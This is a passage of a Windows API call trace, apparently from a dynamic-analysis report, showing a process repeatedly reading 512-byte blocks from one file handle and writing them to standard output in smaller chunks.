[0112.744] GetFileType (hFile=0x4c) returned 0x1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] GetFileType (hFile=0x4c) returned 0x1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] GetFileType (hFile=0x4c) returned 0x1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] GetFileType (hFile=0x4c) returned 0x1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] GetFileType (hFile=0x4c) returned 0x1 [0112.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.744] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.745] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.745] SetFilePointerEx (in: 
hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.745] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.745] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] GetFileType (hFile=0x4c) returned 0x1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] GetFileType (hFile=0x4c) returned 0x1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] GetFileType (hFile=0x4c) returned 0x1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] GetFileType (hFile=0x4c) returned 0x1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] GetFileType (hFile=0x4c) returned 0x1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: 
lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] GetFileType (hFile=0x4c) returned 0x1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] GetFileType (hFile=0x4c) returned 0x1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] GetFileType (hFile=0x4c) returned 0x1 [0112.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.745] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.746] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.746] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] GetFileType (hFile=0x4c) returned 0x1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] GetFileType (hFile=0x4c) returned 0x1 [0112.746] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0112.746] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] GetFileType (hFile=0x4c) returned 0x1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] GetFileType (hFile=0x4c) returned 0x1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] GetFileType (hFile=0x4c) returned 0x1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] GetFileType (hFile=0x4c) returned 0x1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] GetFileType (hFile=0x4c) returned 0x1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0112.746] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] GetFileType (hFile=0x4c) returned 0x1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.747] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.747] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.747] GetFileType (hFile=0x4c) returned 0x1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.747] GetFileType (hFile=0x4c) returned 0x1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.747] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.747] GetFileType (hFile=0x4c) returned 0x1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.747] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 
[0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.747] GetFileType (hFile=0x4c) returned 0x1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.747] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.747] GetFileType (hFile=0x4c) returned 0x1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.747] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.747] GetFileType (hFile=0x4c) returned 0x1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.747] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.747] GetFileType (hFile=0x4c) returned 0x1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.747] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] GetFileType (hFile=0x4c) returned 0x1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.748] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0112.748] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.748] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.748] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] GetFileType (hFile=0x4c) returned 0x1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] GetFileType (hFile=0x4c) returned 0x1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] GetFileType (hFile=0x4c) returned 0x1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] GetFileType (hFile=0x4c) returned 0x1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] GetFileType (hFile=0x4c) returned 0x1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] GetFileType (hFile=0x4c) returned 0x1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] GetFileType (hFile=0x4c) returned 0x1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] GetFileType (hFile=0x4c) returned 0x1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.749] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.749] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.749] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.749] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] GetFileType (hFile=0x4c) returned 0x1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] GetFileType 
(hFile=0x4c) returned 0x1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] GetFileType (hFile=0x4c) returned 0x1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] GetFileType (hFile=0x4c) returned 0x1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] GetFileType (hFile=0x4c) returned 0x1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] GetFileType (hFile=0x4c) returned 0x1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] GetFileType (hFile=0x4c) returned 0x1 [0112.749] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.750] GetFileType (hFile=0x4c) returned 0x1 [0112.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.750] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.750] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.750] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.750] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.750] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.750] GetFileType (hFile=0x4c) returned 0x1 [0112.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.750] GetFileType (hFile=0x4c) returned 0x1 [0112.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.750] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.750] GetFileType (hFile=0x4c) returned 0x1 [0112.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.750] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, 
lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.750] GetFileType (hFile=0x4c) returned 0x1 [0112.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.750] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.750] GetFileType (hFile=0x4c) returned 0x1 [0112.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.750] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.750] GetFileType (hFile=0x4c) returned 0x1 [0112.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.750] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] GetFileType (hFile=0x4c) returned 0x1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] GetFileType (hFile=0x4c) returned 0x1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, 
lpOverlapped=0x0) returned 1 [0112.751] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.751] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.751] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.751] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] GetFileType (hFile=0x4c) returned 0x1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] GetFileType (hFile=0x4c) returned 0x1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] GetFileType (hFile=0x4c) returned 0x1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] GetFileType (hFile=0x4c) returned 0x1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] GetFileType (hFile=0x4c) returned 0x1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] WriteFile (in: hFile=0x4c, 
